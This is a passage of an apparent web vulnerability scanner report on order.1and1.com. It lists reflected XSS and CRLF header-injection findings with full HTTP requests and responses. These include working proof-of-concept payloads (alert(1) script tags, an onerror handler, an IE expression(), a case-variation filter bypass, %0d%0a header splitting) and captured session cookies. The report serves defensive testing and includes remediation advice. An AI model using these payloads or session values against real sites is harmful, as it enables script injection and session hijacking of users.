This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Service2eb97</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>359b8a2e72d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Service;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:38:12 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=ObmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS4xLC8wKSo=; Expires=Fri, 07-Apr-2079 21:52:19 GMT; Path=/
ETag: c4342f28d37068506013b97debbec70f
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18491


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
9CC9FB631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Service";UNOUNO.params.lastpage="Service2eb97</ScRiPt ><x style=x:expression(alert(1))>359b8a2e72d";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.24. http://order.1and1.com/xml/order/Sharepoint [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Sharepoint

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Sharepoint is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Sharepoint. The payload 2f20e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1ed21c34ec was submitted in the REST URL parameter 3. This input was returned as 2f20e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>1ed21c34ec in a subsequent request for the URL /xml/order/Sharepoint.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/Sharepoint2f20e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1ed21c34ec;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:35:11 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=EYVY9QEE3YGBgWm1jajBoYi8hK2RXUSlAM0QsMC0tLCosKicnKikjJiodHx4dGj8tcGVndS0vKlozXWwyJSYiISYiICMhGyMxMDlxcjgtNGRtMyYnIyInJCEkHyIjHDQ=; Expires=Fri, 07-Apr-2079 21:49:18 GMT; Path=/
ETag: e83c3ad0fe1642c7f919fde422e24b61
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25676


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Sharepoint";UNOUNO.params.lastpage="Sharepoint2f20e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>1ed21c34ec";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.25. http://order.1and1.com/xml/order/VirtualServerL [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerL

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/VirtualServerL is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/VirtualServerL. The payload dddff</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>d0fee8f5448 was submitted in the REST URL parameter 3. This input was returned as dddff</ScRiPt ><img src=a onerror=alert(1)>d0fee8f5448 in a subsequent request for the URL /xml/order/VirtualServerL.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/VirtualServerLdddff</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>d0fee8f5448;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=CloudDynamicServer; ucuo=20110320185042-000.TCpfix141a; lastpage=VirtualServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=hdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUqMWFqMCMkIB8kIR8fHjMxMzY=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:31:AAABLtRnmq4LJJFFFit1Kk3sM2vCTUk2:1300643682990; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Request 2

GET /xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=CloudDynamicServer; ucuo=20110320185042-000.TCpfix141a; lastpage=VirtualServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=hdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUqMWFqMCMkIB8kIR8fHjMxMzY=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:31:AAABLtRnmq4LJJFFFit1Kk3sM2vCTUk2:1300643682990; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:55:14 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=1bmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS8vLiwqLC8=; Expires=Fri, 07-Apr-2079 21:09:21 GMT; Path=/
ETag: 4e920a97deb964d5714c04e7a127f5e2
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 49849


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
891BE.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="VirtualServerL";UNOUNO.params.lastpage="VirtualServerLdddff</ScRiPt ><img src=a onerror=alert(1)>d0fee8f5448";UNOUNO.params.articles="1|tariff-vps-l"};
   //-->
...[SNIP]...

1.26. http://order.1and1.com/xml/order/popupDomainPrices [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupDomainPrices

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/popupDomainPrices is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/popupDomainPrices. The payload 753b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>63529f6639f was submitted in the REST URL parameter 3. This input was returned as 753b5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>63529f6639f in a subsequent request for the URL /xml/order/popupDomainPrices.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/popupDomainPrices753b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>63529f6639f;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:48:45 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=VZ1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 22:02:52 GMT; Path=/
ETag: f4b8ec0d36405e52072e7ef2a900c637
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20365


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="popupDomainPrices";UNOUNO.params.lastpage="popupDomainPrices753b5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>63529f6639f";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2. HTTP header injection
There are 12 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://order.1and1.com/xml/order/Jumpto [jsessionid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the jsessionid request parameter is copied into the Location response header. The payload ed455%0d%0a503217b4f8d was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_toped455%0d%0a503217b4f8d&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:57 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.WH.US&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.WH.US&linkOrigin=Hosting&linkId=hd.log.eue&__frame=_toped455
503217b4f8d

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=5al8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:37:04 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


2.2. http://order.1and1.com/xml/order/Jumpto [linkId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the linkId request parameter is copied into the Location response header. The payload c29e1%0d%0a97b1abda1ab was submitted in the linkId parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=c29e1%0d%0a97b1abda1ab&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:57 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.WH.US&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.WH.US&linkOrigin=Hosting&linkId=c29e1
97b1abda1ab
&__frame=_top
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 21:37:04 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


2.3. http://order.1and1.com/xml/order/Jumpto [linkOrigin parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the linkOrigin request parameter is copied into the Location response header. The payload a5802%0d%0a86591ee57c3 was submitted in the linkOrigin parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=a5802%0d%0a86591ee57c3&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
